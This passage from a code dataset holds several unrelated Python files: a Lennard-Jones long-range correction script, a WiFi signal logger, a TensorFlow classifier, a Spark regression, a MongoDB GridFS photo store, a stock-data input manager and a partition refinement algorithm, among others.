supported\")\n elrc = {}\n if rs != rc:\n C3_0 = (rc**2 - rs**2)**3\n C3_2 = 3.0 * rs**2 + 3.0 * rc**2\n C3_3 = 6.0 * rc**2 * rs**2\n C3_4 = rc**6 - 3.0 * rc**4 * rs**2\n\n for slv in self.solvent:\n C0 = 16.0 * math.pi * self.slvNumDensity[slv]\n elrc[slv] = 0.0\n for slvSite in slv.sites:\n for sltSite in self.solute.sites:\n eps = math.sqrt(slvSite.epsilon * sltSite.epsilon)\n sig_2 = slvSite.sigma * sltSite.sigma \n sig_6 = sig_2**3\n sig_12 = sig_6 * sig_6 \n\n term1 = sig_12 / (9.0 * rs**9)\n term2 = -sig_6 / (3.0 * rs**3)\n\n if (rs == rc): \n term3 = 0.\n term4 = 0.\n else:\n term3_1 = -2.0 / 3.0 * (1./rc**3 - 1./rs**3)\n term3_2 = C3_2 / 5.0 * (1./rc**5 - 1./rs**5)\n term3_3 = -C3_3 / 7.0 * (1./rc**7 - 1./rs**7)\n term3_4 = -C3_4 / 9.0 * (1./rc**9 - 1./rs**9)\n term3 = -sig_12 / C3_0 * (term3_1 + term3_2 + term3_3 + term3_4)\n \n term4_1 = -2.0 / 3.0 * (rc**3 - rs**3)\n term4_2 = C3_2 * (rc - rs)\n term4_3 = C3_3 * (1./rc - 1./rs)\n term4_4 = C3_4 / 3.0 * (1./rc**3 - 1./rs**3)\n term4 = -sig_6 / C3_0 * (term4_1 + term4_2 + term4_3 + term4_4)\n \n elrc[slv] += eps * (term1 + term2 + term3 + term4)\n elrc[slv] *= C0 / JOULE_PER_CAL\n elrc['total'] = sum(list(elrc.values())) \n return elrc\n \n\ndef readGroLog(groLogFile, volume):\n isAverage = False\n isVolumeNext = False\n pars = dict.fromkeys(['volume', 'rswitch', 'rcutoff'])\n for line in groLogFile:\n if \"vdwtype\" in line.split():\n pars['vdwtype'] = line.split()[2]\n continue\n if \"rvdw_switch\" in line.split():\n pars['rswitch'] = float(line.split()[2])\n continue\n if \"rvdw\" in line.split():\n pars['rcutoff'] = float(line.split()[2])\n continue\n if \"<==== A V E R A G E S ====>\" in line:\n isAverage = True\n continue\n if isAverage and \"Volume\" in line:\n isVolumeNext = True\n idxVolume = line.split().index(\"Volume\")\n continue\n if isVolumeNext == True:\n pars['volume'] = float(line.split()[idxVolume])\n isVolumeNext = False\n isAverage = False\n if pars['volume'] == None:\n if volume == None:\n sys.exit(\"Unable to find volume in file: \" + str(groLogFile.name) + '\\n' +\n \"If it is an NVT simulation, please input the volume manually, with -v option\")\n else:\n pars['volume'] = volume\n else:\n if volume != None:\n print(\"Warning: two sources of volume were provided.\") \n print(\" I choose the value of -v option only: \", volume)\n pars['volume'] = volume\n return pars\n\n\nparser = argparse.ArgumentParser(description='Calculate LJ long-range correction')\n#parser.add_argument('-l', '--log', type=argparse.FileType('r'), required=True,\n# help='Gromacs log file, for obtaining average volume.')\nparser.add_argument('-l', '--log', required=True,\n help='Gromacs log file, for obtaining average volume.')\nparser.add_argument('-d', '--dir', default=os.getcwd(),\n help='directory where MDinfo and SltInfo are put (default is current working dir)')\nparser.add_argument('-v', '--volume', type=float, default=None, \n help='Volume info for NVT simulations')\n\nargs = parser.parse_args()\nlogFile = codecs.open(args.log, \"r\", \"utf-8\")\n#pars = readGroLog(args.log, args.volume)\npars = readGroLog(logFile, args.volume)\n\nMDinfo = open(args.dir + \"/MDinfo\", 'r')\nSltInfo = open(args.dir + \"/SltInfo\", 'r')\n\n\n#reading MDinfo\nlineCounter = 1\nfor line in MDinfo:\n if lineCounter == 1:\n numTotalType = int(line.split()[1])\n if lineCounter == 2:\n molNum = [int(i) for i in line.split()]\n if lineCounter == 3:\n siteNum = [int(i) for i in line.split()]\n lineCounter += 1\n\n#reading SltInfo\nlineCounter = 1\nsltAtoms = []\nfor line in SltInfo:\n record = [float(line.split()[i]) for i in range(len(line.split())) if i > 1]\n sltAtoms.append(Atom(record[0], record[1:3])) \n\nsolute = Molecule(sltAtoms)\n\n\n#reading MolPrm\nMolPrm = [open(args.dir+\"/MolPrm\"+str(i), 'r') for i in range(1,numTotalType)]\nsolvent = []\nfor file in MolPrm:\n slvAtoms = []\n for line in file:\n record = [float(line.split()[i]) for i in range(len(line.split())) if i > 1]\n slvAtoms.append(Atom(record[0], record[1:3]))\n solvent.append(Molecule(slvAtoms))\n\n#create System\nsystem = System(pars['volume'], solute, solvent, molNum[1:])\n\n#calculate long-range correction\nelrc = system.getElrc(pars['vdwtype'], pars['rswitch'], pars['rcutoff'])\n\n#output results\nprint()\nprint('dir = ' + args.dir)\n#print('log = ' + args.log.name)\nprint('log = ' + args.log)\nprint('rswitch = ' + str(pars['rswitch']))\nprint('rcutoff = ' + str(pars['rcutoff']))\nprint('average volume = ' + str(pars['volume']))\nprint('number density (nm^-3):')\nfor i in range(len(system.solvent)):\n print(' solvent %i = ' % int(i+1), system.slvNumDensity[system.solvent[i]])\nprint('-------------------------------')\nprint('elrc (kcal/mol): ')\nfor i in range(len(system.solvent)):\n print(' solvent %i = ' % int(i+1), elrc[system.solvent[i]])\nprint(' total = ', elrc['total'])\nprint()\n\n#debug\n#print(\"\\n\\n**** debug ****\")\n#system.display()\n\n","sub_path":"src/elrc.py","file_name":"elrc.py","file_ext":"py","file_size_in_byte":8882,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"492896561","text":"import time\nimport json\nfrom threading import Timer\nfrom checkWiFiClients import getSignal\ncount = 0\nTIMES = 300\nDELAY = 1\ntry:\n data = json.load(open(\"data.json\", encoding=\"utf-8\"))\nexcept:\n data = {}\n\n\ndef func():\n signal = getSignal()\n timestamp = time.time()\n for host in signal:\n for client in signal[host]:\n if client not in data:\n data[client] = {\"history\":[]}\n data[client][\"history\"].append([timestamp, host, signal[host][client][1]])\n json.dump(data, open(\"data.json\", \"w\", encoding=\"utf-8\"), ensure_ascii=False, sort_keys=True, indent=4)\n\n\ndef loop():\n global count\n func()\n count += 1\n if True:\n Timer(DELAY, loop).start()\n\n\nTimer(DELAY, loop).start()\n","sub_path":"scheduler.py","file_name":"scheduler.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"436364648","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author: Alexander Schubert\n\n# IMPORTS\n\"\"\"\n\nimport numpy as np \nimport pandas as pd\nimport tensorflow as tf\nfrom Histogram import Histogram\n\n\"\"\"\ninput = pandas.DataFrame # the dataset to be used for training\nlabels = pandas.Series # the class labels\noutput_shape = integer, values for output, for this problem it will usually be 1\n\n\"\"\"\ndef neural_splitter(input, labels, output_shape=1):\n labels = np.asarray(labels).astype('float32').reshape((-1,1))\n \n if isinstance(input[0], Histogram):\n is_histogram=True\n df = pd.DataFrame()\n for i in range(len(input)):\n df = df.append(input[i].get(), ignore_index=True)\n else:\n is_histogram=False\n df = input.copy()\n \n \n \n input_shape = df.shape[1] \n hl1_shape = round(((input_shape - output_shape)/2) + output_shape)\n \n # weights and biases for each layer\n hl1_vals = {\n 'weights':tf.Variable(tf.random_normal([input_shape,hl1_shape])),\n 'biases':tf.Variable(tf.random_normal([hl1_shape])) }\n \n out_vals = {\n 'weights':tf.Variable(tf.random_normal([hl1_shape, output_shape])),\n 'biases':tf.Variable(tf.random_normal([output_shape])) }\n \n input_layer = tf.placeholder('float', [None, input_shape])\n \n def feedforward(input):\n # multiply output of input_layer wth a weight matrix and add biases\n hl1 = tf.nn.relu(\n tf.add(tf.matmul(input, hl1_vals['weights']), \n hl1_vals['biases']))\n \n logits = tf.add(tf.matmul(hl1, out_vals['weights']),\n out_vals['biases'])\n \n # multiply output of layer_1 wth a weight matrix and add biases\n out = tf.nn.sigmoid(logits)\n \n return out, logits\n \n # output_true shall have the original vector for error calculations\n output_pred, logits = feedforward(input_layer)\n output_true = tf.placeholder('float', [None, output_shape])\n \n # define our cost function\n # Binary Crossentropy is common for classification (and for a sigmoid output), while MSE is useful in regression(and linear outputs)\n\n loss = tf.reduce_sum(\n tf.nn.sigmoid_cross_entropy_with_logits( \n labels = output_true,\n logits = logits))\n \n\n #loss = tf.reduce_mean(tf.square(output_pred - output_true))\n\n\n # define our optimizer\n lr = 0.001 # Learning Rate\n optimizer = tf.train.AdamOptimizer(lr).minimize(loss)\n \n \n \"\"\"\n # BATCHING & TRAINING\n \"\"\"\n # defining batch size, number of epochs and learning rate \n # initialising stuff and starting the session\n init = tf.global_variables_initializer()\n sess = tf.Session()\n sess.run(init)\n \n # running the model for X epochs taking 100 trucks in batches\n # total improvement is printed out after each epoch\n def train(input):\n \"\"\"\n TODO: cross validate\n \"\"\"\n batch_size = 100\n e = 50\n tot_rows = input.shape[0]\n for epoch in range(e):\n \n epoch_loss = 0 # initializing error as 0\n\n for i in range(int(tot_rows/batch_size)):\n # Get next batch\n batch_x = input[ i*batch_size : (i+1)*batch_size ]\n batch_y = labels[ i*batch_size : (i+1)*batch_size]\n \n # Run optimizer (backprop)\n _, c = sess.run([optimizer, loss],\\\n feed_dict={input_layer: batch_x, \\\n output_true: batch_y})\n \n epoch_loss += c\n #if epoch == 0 or epoch == 24 or epoch == 49 or epoch == 74 or epoch == 99:\n #print('Epoch', epoch+1, '/', e, 'loss:',epoch_loss)\n \n \n def run(input):\n results = output_pred.eval(session=sess,feed_dict={input_layer:input})\n #results = pd.DataFrame(data=results[0:,0:], columns=column_names)\n return results\n \n train(df)\n preds = run(df)\n if is_histogram:\n df = input.copy()\n for i in range(len(df)):\n df[i].setSplitValue(preds[i,0])\n \n return df, preds\n \n \n \n# Example of running neural net\ndef test():\n # load dataset (should be one histogram, but works for any data)\n x = pd.read_csv(\"./data/TestData.csv\") \n #drop index column (generated when saving to csv with pandas)\n x.drop(x.columns[0], axis=1, inplace=True)\n \n #extract class labels, and drop from dataframe\n labels = x['class']\n x.drop('class', axis=1, inplace=True)\n \n # run network, currently does nothing with the results, but its an array of percentile predictions\n results = neural_network(x, labels)\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n ","sub_path":"NeuralSplitter.py","file_name":"NeuralSplitter.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"210531283","text":"# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution(object):\n def isSameTree1(self, p, q):\n \"\"\"\n :type p: TreeNode\n :type q: TreeNode\n :rtype: bool\n \"\"\"\n if not p and not q:\n return True\n elif not p or not q:\n return False\n\n if p.val != q.val:\n return False\n\n if (not self.isSameTree(p.left, q.left) or\n not self.isSameTree(p.right, q.right)):\n return False\n\n return True\n\n def isSameTree2(self, p, q):\n \"\"\"\n :type p: TreeNode\n :type q: TreeNode\n :rtype: bool\n \"\"\"\n q1, q2 = [p], [q]\n while q1 and q2:\n n1, n2 = q1.pop(), q2.pop()\n if not n1 and not n2:\n continue\n elif not (n1 and n2):\n return False\n elif n1.val != n2.val:\n return False\n\n q1.insert(0, n1.left)\n q2.insert(0, n2.left)\n q1.insert(0, n1.right)\n q2.insert(0, n2.right)\n\n return True\n\n def convertToTree(self, nums):\n nodes = [TreeNode(x) if x else None\n for x in nums]\n for i, n in enumerate(nodes):\n if not n:\n continue\n li = 2 * i + 1\n ri = 2 * i + 2\n if li < len(nodes):\n n.left = nodes[li]\n if ri < len(nodes):\n n.right = nodes[ri]\n return nodes[0]\n\n\nif __name__ == '__main__':\n s = Solution()\n p = s.convertToTree([1, 2])\n q = s.convertToTree([1, None, 2])\n r = s.isSameTree(p, q)\n print(r)\n p = s.convertToTree([1, 2, 1])\n q = s.convertToTree([1, 1, 2])\n r = s.isSameTree(p, q)\n print(r)\n p = s.convertToTree([1, 2, 3])\n q = s.convertToTree([1, 2, 3])\n r = s.isSameTree(p, q)\n print(r)\n","sub_path":"leetcode/easy/same-tree.py","file_name":"same-tree.py","file_ext":"py","file_size_in_byte":1985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"514053545","text":"# Creating spark session\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.ml.regression import LinearRegression\nfrom pyspark.sql import SparkSession\n\nspark = SparkSession.builder.appName(\"LinerReg App\").getOrCreate()\nspark.sparkContext.setLogLevel(\"ERROR\")\n\n# Loading the data\ndata = spark.read.format(\"csv\").option(\"header\", True) \\\n .option(\"inferSchema\", True) \\\n .option(\"delimiter\", \",\") \\\n .load(\"D:\\\\UMKC\\\\__Spring2020\\\\CS5590BDP\\\\Module-2\\\\Lesson-7\\\\MachineLearning\\\\data\\\\imports-85.data\")\n\n\ndata.printSchema()\n\ndata = data.withColumnRenamed(\"wheel-base\",\"label\").select(\"label\", \"length\", \"width\", \"height\")\ndata.show()\n\nassembler = VectorAssembler(inputCols=data.columns[1:], outputCol=\"features\")\ndata = assembler.transform(data)\ndata.show()\n\n\nlr = LinearRegression(maxIter=10, regParam=0.3, elasticNetParam=0.8)\n\n# Fit the model\nmodel = lr.fit(data)\n\n# Print the coefficients and intercept for linear regression\nprint(\"Coefficients: %s\" % str(model.coefficients))\nprint(\"Intercept: %s\" % str(model.intercept))\n\n# Summarize the model over the training set and print out some metrics\ntrainingSummary = model.summary\nprint(\"numIterations: %d\" % trainingSummary.totalIterations)\nprint(\"objectiveHistory: %s\" % str(trainingSummary.objectiveHistory))\ntrainingSummary.residuals.show()\nprint(\"RMSE: %f\" % trainingSummary.rootMeanSquaredError)\nprint(\"r2: %f\" % trainingSummary.r2)\n\n","sub_path":"ICP-14/SourceCode/regression/lineer_regression.py","file_name":"lineer_regression.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"69050285","text":"def find_grants_cap(grantsArray, newBudget):\n tot = len(grantsArray)\n arr = sorted(grantsArray, reverse=True)\n arr.append(0)\n\n # calculate the total amount we need to\n # cut back to meet the reduced budget\n surplus = sum(grantsArray) - newBudget\n if surplus <= 0:\n return arr[0]\n\n # ok so we don't meet the budget, we must find the lowest cap\n for i in range(tot-1):\n # new surplus\n surplus -= (i + 1) * (arr[i] - arr[i + 1])\n if surplus <= 0:\n break\n\n abc = (-surplus / float(i + 1))\n return arr[i + 1] + abc\n\nprint(find_grants_cap([2,100,50,120,1000], 190))","sub_path":"grants_caps.py","file_name":"grants_caps.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"412036375","text":"from django.urls import path, include\r\nfrom .views import LoginView, RegisterView, RefreshView, UserProfileView\r\nfrom rest_framework.routers import DefaultRouter\r\n\r\nrouter = DefaultRouter()\r\nrouter.register(\"profile\", UserProfileView)\r\n\r\nurlpatterns = [\r\n path('', include(router.urls)),\r\n path('login', LoginView.as_view()),\r\n path('register', RegisterView.as_view()),\r\n path('refresh', RefreshView.as_view()),\r\n]\r\n","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"566069333","text":"#Gabi Tessier, 7/19/2019\n#This creates a database with MongoDB with PyMongo\nimport pymongo\nfrom bson.objectid import ObjectId\nimport gridfs\nfrom bson import objectid\n\n\n\n#uploadphoto , downloadphoto\nclass RemSensDB():\n db = None\n fs = None\n\n #creats the database\n def DataBaseInitialize(self):\n client = pymongo.MongoClient(\"mognodb://127.0.0.1/datatbase\")\n #Creating a client\n self.db = client[\"database\"]\n\n #storing data\n self.fs = gridfs.GridFS(self.db)\n\n #inserts data into the database from the json file\n #THIS IS NOT USED TO INSERT PHOTO'S - ONLY DATA****\n def insertData(self, js):\n self.db[\"raw_images\"].insert_many(js)\n\n #finds the object from a given id (i)\n def findByID(self, i):\n data = False\n try:\n ObjectId(i)\n except Exception as e:\n raise AssertionError(\"Invalid ID\")\n for grid_out in self.fs.find({\"_id\": ObjectId(i)}):\n data = grid_out.read()\n\n return data\n\n\n #finds the object from a given name (n)\n def findByName(self, n):\n for grid_out in self.fs.find({\"filename\": n}):\n data = grid_out.read()\n\n return data\n\n # store the data in the database. Returns the id of the file in gridFS\n def uploadphoto(self, b, name):\n with open(b, 'rb') as b:\n store = self.fs.put(b, filename = name)\n return store\n\n# create an output file and store the image in the output file\n def downloadphoto(self, a):\n #retrieving data and returning .jpg in bytes\n outputdata = self.fs.get(a).read()\n return outputdata\n\n def __init__(self):\n self.DataBaseInitialize()\n #self.insertData()\n\nif __name__ == \"__main__\":\n dbMan = RemSensDB()\n\n #---------------TEST VARIABLES--------------------#\n na = \"image1\"\n id = \"5d31ceeff814e0b3a9fe59de\"\n n = \"image1.jpg\"\n filename = \"\"\n\n #-------------------METHODS------------------------#\n\n #++++++++++++DO NOT USE++++++++++++++++#\n #dbMan.insertData(file)\n #dbMan.queryDB(query)\n #dbMan.findByDate(da)\n\n #+++++++++++USE++++++++++++++++++++++++#\n #dbMan.findByName(na)\n #dbMan.findByID(id)\n dbMan.uploadphoto(filename, n)\n dbMan.downloadphoto(dbMan.uploadphoto(filename))\n","sub_path":"RemoteSensingDB.py","file_name":"RemoteSensingDB.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"556558497","text":"\"\"\"\nExercicio 5.14\nVejamos como exemplo um programa que leia um valor e que imprima a quantidade\nde cédulas necessárias para pagar esse mesmo valor, apresentado na lsitagem\n5.14. Para simplificar, vamos trabalhar apenas com valores inteiros e com\ncédulas de R$ 50, R$ 20, R$ 10, R$ 5, R$ 1\n\"\"\"\nvalor = int(input('Digite o valor a pagar: '))\ncedulas = 0\natual = 50\nwhile True:\n if atual <= valor:\n valor = valor - atual\n cedulas += 1\n else:\n print('{} cédula(s) de R$ {}'.format(cedulas, atual))\n if valor == 0:\n break\n if atual == 50:\n atual = 20\n elif atual == 20:\n atual = 10\n elif atual == 10:\n atual = 5\n elif atual == 5:\n atual = 1\n cedulas = 0\n","sub_path":"listagem_2.py","file_name":"listagem_2.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"618914588","text":"# -*- encoding:utf-8 -*-\n\nimport io\nimport os\nimport re\nimport sys\nimport imp\nimport json\nimport sqlite3\nimport datetime\n\n# save python familly\nPY3 = True if sys.version_info[0] >= 3 else False\nif PY3:\n\timport configparser\n\timport queue\n\tinput = input \nelse:\n\timport Queue as queue\n\timport ConfigParser as configparser\n\tinput = raw_input\n\n\n# configuration pathes\nROOT = os.path.abspath(os.path.dirname(__file__))\nJSON = os.path.abspath(os.path.join(ROOT, \".json\"))\nDATA = os.path.abspath(os.path.join(ROOT, \"app\", \".data\"))\nLOG = os.path.abspath(os.path.join(ROOT, \"app\", \".log\"))\n\n\n# add the modules folder to the package path\n__path__.append(os.path.abspath(os.path.join(ROOT, \"modules\")))\n# add custom modules pathes from modules.pth file\n# targeted python code could be anywhere where user can access\npathfile = os.path.join(ROOT, \"modules.pth\")\nif os.path.exists(pathfile):\n\twith io.open(pathfile) as pathes:\n\t\tcomment = re.compile(r\"^[\\s]*#.*\")\n\t\tfor path in [p.strip() for p in pathes.read().split(\"\\n\") if not comment.match(p)]:\n\t\t\tif path != \"\":\n\t\t\t\t__path__.append(os.path.abspath(path))\n\n\ndef loadJson(name, folder=None):\n\tfilename = os.path.join(JSON, name if not folder else os.path.join(folder, name))\n\tif os.path.exists(filename):\n\t\twith io.open(filename) as in_:\n\t\t\treturn json.load(in_)\n\telse:\n\t\treturn {}\n\n\ndef dumpJson(data, name, folder=None):\n\tfilename = os.path.join(JSON, name if not folder else os.path.join(folder, name))\n\ttry: os.makedirs(os.path.dirname(filename))\n\texcept OSError: pass\n\twith io.open(filename, \"w\" if PY3 else \"wb\") as out:\n\t\tjson.dump(data, out, indent=4)\n\n\ndef logMsg(msg, logname=None, dated=False):\n\tif logname:\n\t\tlogfile = os.path.join(LOG, logname)\n\t\ttry:\n\t\t\tos.makedirs(os.path.dirname(logfile))\n\t\texcept OSError:\n\t\t\tpass\n\t\tstdout = io.open(logfile, \"a\")\n\telse:\n\t\tstdout = sys.stdout\n\n\tstdout.write(\n\t\t\">>> \" + \\\n\t\t(\"[%s] \" % datetime.datetime.now().strftime(\"%x %X\") if dated else \"\") + \\\n\t\t\"%s\\n\" % msg\n\t)\n\tstdout.flush()\n\n\tif logname:\n\t\treturn stdout.close()\n\n\ndef chooseItem(msg, *elem):\n\tn = len(elem)\n\tif n > 1:\n\t\tsys.stdout.write(msg + \"\\n\")\n\t\tfor i in range(n):\n\t\t\tsys.stdout.write(\" %d - %s\\n\" % (i + 1, elem[i]))\n\t\tsys.stdout.write(\" 0 - quit\\n\")\n\t\ti = -1\n\t\twhile i < 0 or i > n:\n\t\t\ttry:\n\t\t\t\ti = input(\"Choose an item: [1-%d]> \" % n)\n\t\t\t\ti = int(i)\n\t\t\texcept ValueError:\n\t\t\t\ti = -1\n\t\t\texcept KeyboardInterrupt:\n\t\t\t\tsys.stdout.write(\"\\n\")\n\t\t\t\tsys.stdout.flush()\n\t\t\t\treturn False\n\t\tif i == 0:\n\t\t\treturn None\n\t\treturn elem[i - 1]\n\telif n == 1:\n\t\treturn elem[0]\n\telse:\n\t\tsys.stdout.write(\"Nothing to choose...\\n\")\n\t\treturn False\n\n\ndef initDB():\n\tdatabase = os.path.join(DATA, \"database.db\")\n\tif not os.path.exists(DATA):\n\t\tos.makedirs(DATA)\n\tsqlite = sqlite3.connect(database)\n\tcursor = sqlite.cursor()\n\tcursor.execute(\"CREATE TABLE IF NOT EXISTS history(signature TEXT, autorization TEXT);\")\n\tcursor.execute(\"CREATE UNIQUE INDEX IF NOT EXISTS history_index ON history(signature);\")\n\tsqlite.row_factory = sqlite3.Row\n\tsqlite.commit()\n\treturn sqlite\n\n","sub_path":"lystener/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"143418663","text":"import numpy as np\nimport pandas as pd\nimport tensorflow as tf\nimport os, json, heapq, operator\nimport matplotlib.pyplot as plt\nfrom datetime import datetime, timedelta\nfrom bisect import bisect, bisect_left, bisect_right\n\nclass InputManager:\n def __init__(self, reach, shift, length):\n self.R = reach\n self.S = shift\n self.L = length\n self.file_list = {f: pd.read_csv(os.path.join(price_path, f)).set_index('') for f in os.listdir(price_path) if not f.startswith('WIG')}\n self.samples = []\n self.labels = []\n self.encoding = 'R_' + str(self.R) + 'S_' + str(self.S)\n self.fatalities = 0\n \n def extract_data(self, start_date='19900101', end_date='20140101'):\n for name, file in self.file_list.items():\n dates = list(map(str, file.index))\n start_ind = bisect(dates, start_date)\n end_ind = bisect(dates, end_date)\n final = bisect(dates, (datetime.strptime(end_date, '%Y%m%d')+timedelta(days=self.R+3)).strftime('%Y%m%d'))\n if end_ind == final:\n end_ind -= self.R\n dates = dates[start_ind:final]\n dates_ind_dict = dict(zip(dates, list(range(len(dates)))))\n if len(dates) == 0 or end_ind < 0:\n continue\n \n prices = file[''].as_matrix()[start_ind:final]\n \n \n self.comp_sample = []\n self.comp_labels = []\n end_date_dt = datetime.strptime(dates[end_ind-start_ind], '%Y%m%d')\n \n \n for run in range(self.S):\n try:\n things = prices[run:]\n\n current_date = datetime.strptime(dates[run], '%Y%m%d')\n slices = []\n respective_dates = []\n while current_date < end_date_dt:\n c = current_date.strftime('%Y%m%d')\n while current_date < end_date_dt and c not in dates_ind_dict:\n current_date += timedelta(days=1)\n c = current_date.strftime('%Y%m%d')\n\n if current_date == end_date_dt:\n break\n slices.append(prices[dates_ind_dict[c]])\n respective_dates.append(dates[dates_ind_dict[c]])\n current_date += timedelta(days=self.S)\n\n for nr in range(len(slices)-self.L-1):\n\n last_date = respective_dates[nr+self.L+1]\n check_date = datetime.strptime(last_date, '%Y%m%d')+timedelta(days=self.R)\n while check_date < end_date_dt + timedelta(days=self.R+3) and check_date.strftime('%Y%m%d') not in dates_ind_dict:\n check_date += timedelta(days=1)\n\n if check_date.strftime('%Y%m%d') not in dates_ind_dict:\n continue\n self.samples.append(slices[nr:nr+self.L+1])\n result = int((prices[dates_ind_dict[check_date.strftime('%Y%m%d')]] - prices[dates_ind_dict[last_date]]) > 0)\n if result == 1:\n self.labels.append([0,1])\n elif result == 0:\n self.labels.append([1,0])\n except:\n print('something bad happend at', name, ' while run number', run)\n continue\n \n self.samples = np.array(self.samples)\n \n def scale(self):\n if len(self.samples)==0:\n print('no samples to preprocess')\n sample_mean = np.mean(self.samples)\n sample_std = np.std(self.samples)\n self.samples = (self.samples-sample_mean)/sample_std\n \n\n def polynom(self, inplace=True, degree=2):\n if len(self.samples)==0:\n print('no samples to preprocess')\n \n pf = PF(degree=degree, interaction_only=True, include_bias=False)\n if inplace:\n self.samples = pf.fit_transform(self.samples)\n return\n return pf.fit_transform(self.samples)\n \n \n \n def rel(self, inplace=False):\n if len(self.samples) == 0:\n print('no samples to preprocess')\n \n C = (self.samples[:, -1][None].T - self.samples[:, :-1])/self.samples[:, :-1]\n if inplace:\n self.samples = C\n return\n return C\n \n def get_data(self):\n return self.samples, self.labels\n \n \n \n \n \n \n\n \n \n \n \n \n \n\n","sub_path":"simple neural network/input_manager.py","file_name":"input_manager.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"647739531","text":"import math\ndef correlation_numerator(x,y,n):\n sum_xy=sum([a*b for a,b in zip(x,y)])\n sumX_sumY=sum(x)*sum(y)\n return (n*sum_xy)-(sumX_sumY)\n\ndef correlation_denominator(x,y,n):\n square_x=sum([a*b for a,b in zip(x,x)])\n total_sum_x=sum(x)*sum(x)\n square_y=sum([a*b for a,b in zip(y,y)])\n total_sum_y=sum(y)*sum(y)\n return (math.sqrt((n*square_x)-total_sum_x)*math.sqrt((n*square_y)-total_sum_y))\n\ndef pearson(num,denom):\n return num/denom\n \nn = int(input())\nmathematics = []\nphysics = []\nchemistry = []\nfor i in range(n):\n elements = list(map(float, input().split()))\n mathematics.append(elements[0])\n physics.append(elements[1])\n chemistry.append(elements[2])\n\nprint('%.2f' % pearson(correlation_numerator(mathematics,physics,n), correlation_denominator(mathematics,physics,n))) \nprint('%.2f' % pearson(correlation_numerator(physics,chemistry,n),correlation_denominator(physics,chemistry,n))) \nprint('%.2f' % pearson(correlation_numerator(chemistry,mathematics,n),correlation_denominator(chemistry,mathematics,n))) \n\n\n","sub_path":"HackPearsoncorrelation.py","file_name":"HackPearsoncorrelation.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"3"} +{"seq_id":"286288988","text":"\"\"\"\n`PartitionRefinement` is a data structure for representing a partition of a\nset. Unlike the better-known `UnionFind` data structure, which *merges* sets,\nthe `PartitionRefinement` data structure performs the \"dual\" operation of\n*splitting* sets.\n\nImportant use cases:\n - Efficient DFA minimization\n\nReferences:\n https://en.wikipedia.org/wiki/Partition_refinement\n\nOriginal version by Ryan Cotterell\n\n\"\"\"\n\nimport numpy as np\nfrom collections import defaultdict\nfrom arsenal import colors\n\n\ndef stable(f, P):\n \"Is partition P stable?\"\n D = {}\n for n, B in enumerate(P):\n for q in B:\n D[q] = n\n for B in P:\n for p in B:\n for q in B:\n if D[f[p]] != D[f[q]]:\n return False\n return True\n\n\ndef split(S, P):\n return frozenset(P & S), frozenset(P-S)\n\n\ndef hopcroft(f, P):\n\n # compute the pre-image of f\n finv = defaultdict(set)\n for n in f:\n finv[f[n]].add(n)\n\n stack = list(P)\n\n while stack: # empties in O(log n) steps\n S = stack.pop()\n R = set() # new refinement\n\n # compute subset of the pre-image in O(n) time\n Sinv = set.union(*[finv[x] for x in S])\n\n for B in P: # entire loop runs in O(n) time\n X, Y = split(Sinv, B) # runs in O(|B|) time\n\n if len(X) > 0 and len(Y) > 0:\n # X, Y are now part of the refinement\n R.add(X)\n R.add(Y)\n\n # Hopcroft's speed-up to the slower algorithm is that we\n # only need to enqueue the smaller set.\n if len(X) < len(Y):\n stack.append(X)\n else:\n stack.append(Y)\n else:\n # Q remains part of the refinement\n R.add(B)\n P = R\n\n return frozenset(P)\n\n\ndef slow(f, P):\n\n # compute the pre-image of f\n finv = defaultdict(set)\n for n in f:\n finv[f[n]].add(n)\n\n stack = list(P)\n\n while stack: # empties in O(n) steps\n S = stack.pop()\n R = set() # new refinement\n\n # compute subset of the pre-image in O(n) time\n Sinv = set.union(*[finv[x] for x in S])\n\n for B in P: # entire loop runs in O(n) time\n X, Y = split(Sinv, B) # runs in O(|B|) time\n\n if len(X) > 0 and len(Y) > 0:\n # X, Y are now part of the refinement\n R.add(X)\n R.add(Y)\n\n # X, Y become future splitters\n stack.append(X)\n stack.append(Y)\n else:\n # Q remains part of the refinement\n R.add(B)\n P = R\n\n return frozenset(P)\n\n\ndef test_partition():\n import random\n\n for _ in range(25):\n N = 50\n\n # create random total function\n f = dict(zip(range(N), random.choices(range(N), k=N)))\n\n # create random partition\n i = random.randint(2, N-1)\n P = np.random.permutation(range(N))\n P = { frozenset(P[:i]), frozenset(P[i:]) }\n\n want = slow(f, P)\n have = hopcroft(f, P)\n assert want == have\n assert stable(f, have)\n #print(want)\n\n print(colors.ok)\n\n\nif __name__ == '__main__':\n from arsenal import testing_framework\n 